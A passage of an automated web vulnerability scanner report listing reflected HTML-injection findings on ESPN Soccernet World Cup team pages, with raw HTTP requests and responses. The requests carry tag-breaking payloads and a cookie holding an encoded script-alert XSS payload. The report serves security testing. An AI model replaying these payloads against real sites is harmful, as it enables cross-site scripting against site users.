s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:15:13 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:15:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN15
Cache-Expires: Sat, 06 Nov 2010 23:20:08 GMT
Content-Length: 81695
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ivory Coast Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=4789&_slug_=ivory-coasta81a1"><a>b81a40a8bd9&topId=802166&linktext=Eriksson+hails+Ivory+Coast+players">
...[SNIP]...
|
2.42. http://soccernet.espn.go.com/worldcup2010/team/_/team/4789/ivory-coast [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/4789/ivory-coast |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ff8"><a>ef29493db25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4789/ivory-coast?44ff8"><a>ef29493db25=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:11:09 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:11:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 23:16:08 GMT
Content-Length: 81803
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ivory Coast Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=4789&44ff8"><a>ef29493db25=1&_slug_=ivory-coast&44ff8">
...[SNIP]...
|
2.43. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/479/denmark |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46b84"><a>1e9fca54d00 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/479/denmark46b84"><a>1e9fca54d00 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:48 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN31
Cache-Expires: Sat, 06 Nov 2010 23:13:48 GMT
Content-Length: 82130
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Denmark Football /
...[SNIP]...
<a href="/worldcup2010/team?team=479&_slug_=denmark46b84"><a>1e9fca54d00&topId=801786&linktext=Denmark+coach+devastated+by+defeat">
...[SNIP]...
|
2.44. http://soccernet.espn.go.com/worldcup2010/team/_/team/479/denmark [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/479/denmark |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92395"><a>78611054bea was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/479/denmark?92395"><a>78611054bea=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:07:53 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:07:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN06
Cache-Expires: Sat, 06 Nov 2010 23:12:53 GMT
Content-Length: 82238
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Denmark Football /
...[SNIP]...
<a href="/worldcup2010/team?team=479&92395"><a>78611054bea=1&_slug_=denmark&92395">
...[SNIP]...
|
2.45. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/481/germany |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95388"><a>7a7e4d9961e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/481/germany95388"><a>7a7e4d9961e HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:09:42 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:09:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN04
Cache-Expires: Sat, 06 Nov 2010 23:14:42 GMT
Content-Length: 80545
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Germany Football /
...[SNIP]...
<a href="/worldcup2010/team?team=481&_slug_=germany95388"><a>7a7e4d9961e&topId=807747&linktext=Germany+finish+in+third+place">
...[SNIP]...
|
2.46. http://soccernet.espn.go.com/worldcup2010/team/_/team/481/germany [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/481/germany |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6197"><a>19cb7e46d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/481/germany?c6197"><a>19cb7e46d2e=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:44 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN18
Cache-Expires: Sat, 06 Nov 2010 23:13:43 GMT
Content-Length: 80653
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Germany Football /
...[SNIP]...
<a href="/worldcup2010/team?team=481&c6197"><a>19cb7e46d2e=1&_slug_=germany&c6197">
...[SNIP]...
|
2.47. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/482/portugal |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1efcc"><a>d926d468a72 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/482/portugal1efcc"><a>d926d468a72 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:26:53 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:26:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Sat, 06 Nov 2010 23:31:53 GMT
Content-Length: 81605
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Portugal Football /
...[SNIP]...
<a href="/worldcup2010/team?team=482&_slug_=portugal1efcc"><a>d926d468a72&topId=804233&linktext=Portugal+depart+after+Spain+defeat">
...[SNIP]...
|
2.48. http://soccernet.espn.go.com/worldcup2010/team/_/team/482/portugal [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/482/portugal |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9668"><a>dbe5bd058c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/482/portugal?c9668"><a>dbe5bd058c5=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:23:26 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:23:26 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:28:26 GMT
Content-Length: 81713
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Portugal Football /
...[SNIP]...
<a href="/worldcup2010/team?team=482&c9668"><a>dbe5bd058c5=1&_slug_=portugal&c9668">
...[SNIP]...
|
2.49. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/4860/north-korea |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94792"><a>24dd3ae9355 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
